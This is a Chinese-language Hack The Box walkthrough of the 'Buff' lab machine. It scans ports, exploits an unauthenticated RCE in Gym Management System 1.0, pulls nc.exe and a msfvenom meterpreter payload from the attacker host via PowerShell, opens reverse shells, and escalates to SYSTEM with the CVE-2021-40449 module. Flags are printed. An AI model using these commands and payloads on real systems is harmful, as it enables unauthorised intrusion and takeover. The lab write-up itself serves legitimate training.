目录

连接至HTB服务器并启动靶机

信息搜集

使用rustscan对靶机TCP端口进行开放扫描

使用nmap对靶机开放的端口进行脚本、服务扫描

使用curl分别访问靶机的两个端口

使用浏览器访问靶机8080端口页面

漏洞利用

使用searchsploit搜索该WebAPP

通过python2利用该EXP成功getshell

USER_FLAG：ee3335d18df442d891d4f629540a840f

特权提升

攻击机使用msfvenom生成一个msf马子

启动Metasploit

切换到提权扫描模块

ROOT_FLAG：3a40c65e8215ee8b7d6c9b321eec287f

---

连接至HTB服务器并启动靶机

靶机IP：10.10.10.198

分配IP：10.10.16.7

---

信息搜集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a 10.10.10.198 -r 1-65535 --ulimit 5000

使用nmap对靶机开放的端口进行脚本、服务扫描

nmap -p 7680,8080 -sCV 10.10.10.198

使用curl分别访问靶机的两个端口

curl -I http://10.10.10.198:7680
curl -I http://10.10.10.198:8080

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.10.198:7680      
curl: (52) Empty reply from server
                                                                                                                                   
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.10.198:8080
HTTP/1.1 200 OK
Date: Thu, 21 Nov 2024 00:52:37 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Set-Cookie: sec_session_id=dum0rt5r6s2o7ksbai0g2rvhua; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: sec_session_id=tkr1qpofbvg8f3frujuksp9u0n; path=/; HttpOnly
Content-Type: text/html; charset=UTF-8

使用浏览器访问靶机8080端口页面

点击Contact后，页面左侧显示WebAPP为：Gym Management System 1.0

---

漏洞利用

使用searchsploit搜索该WebAPP

searchsploit Gym Management

将其中未认证的RCE漏洞EXP拷贝到当前目录下

searchsploit -m 48506.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 48506.py   
  Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48506
     Path: /usr/share/exploitdb/exploits/php/webapps/48506.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/temp/48506.py

通过python2利用该EXP成功getshell

python2 48506.py 'http://10.10.10.198:8080/'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python2 48506.py 'http://10.10.10.198:8080/'
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG

buff\shaun

但是进来后发现该EXP不仅无法切换到其他目录下而且基本功能无法运行

尝试往靶机上传一个netcat，首先开启一个http服务

python -m http.server 6666

靶机将nc.exe文件进行下载

powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://10.10.16.7:6666/nc.exe','nc.exe')"

本地侧nc开始监听

nc -lvnp 1425

靶机反弹shell回攻击机

nc -e cmd.exe 10.10.16.7 1425

本地侧nc受到回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425                      
listening on [any] 1425 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.198] 49776
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun

查找user_flag位置并查看其内容

C:\xampp\htdocs\gym\upload>cd C:\
cd C:\

C:\>dir /s user.txt
dir /s user.txt
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Desktop

21/11/2024  00:38                34 user.txt
               1 File(s)             34 bytes

     Total Files Listed:
               1 File(s)             34 bytes
               0 Dir(s)   9,804,349,440 bytes free

C:\>type C:\Users\shaun\Desktop\user.txt
type C:\Users\shaun\Desktop\user.txt
ee3335d18df442d891d4f629540a840f

USER_FLAG：ee3335d18df442d891d4f629540a840f

---

特权提升

攻击机使用msfvenom生成一个msf马子

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f exe > shell.exe

通过python再次启动http服务

python -m http.server 6666

靶机将该木马进行下载

powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://10.10.16.7:6666/shell.exe','shell.exe')"

启动Metasploit

msfconsole

使用监听模块

use exploit/multi/handler

配置好选项：PAYLOAD、LHOST、LPORT

靶机运行木马后，本地MSF侧收到回显

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.7:4444
[*] Meterpreter session 1 opened (10.10.16.7:4444 -> 10.10.10.198:49782) at 2024-11-21 01:15:49 -0500

meterpreter > getuid
Server username: BUFF\shaun

将该会话收起

background

切换到提权扫描模块

use post/multi/recon/local_exploit_suggester

配置好选项：SESSION

切换到提权模块

use exploit/windows/local/cve_2021_40449

配置好选项：SESSION、PAYLOAD、LHOST、LPORT

msf6 exploit(windows/local/cve_2021_40449) > exploit

[*] Started reverse TCP handler on 10.10.16.7:4545
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable Windows 10 v1803 build detected!
[*] Launching netsh to host the DLL...
[+] Process 7264 launched.
[*] Reflectively injecting the DLL into 7264...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (10.10.16.7:4545 -> 10.10.10.198:49784) at 2024-11-21 01:25:57 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

切换到终端

shell

查找root_flag位置并查看其内容

meterpreter > shell
Process 6576 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\>dir /s root.txt
dir /s root.txt
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\Administrator\Desktop

21/11/2024  00:38                34 root.txt
               1 File(s)             34 bytes

     Total Files Listed:
               1 File(s)             34 bytes
               0 Dir(s)   9,801,760,768 bytes free

C:\>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
3a40c65e8215ee8b7d6c9b321eec287f

ROOT_FLAG：3a40c65e8215ee8b7d6c9b321eec287f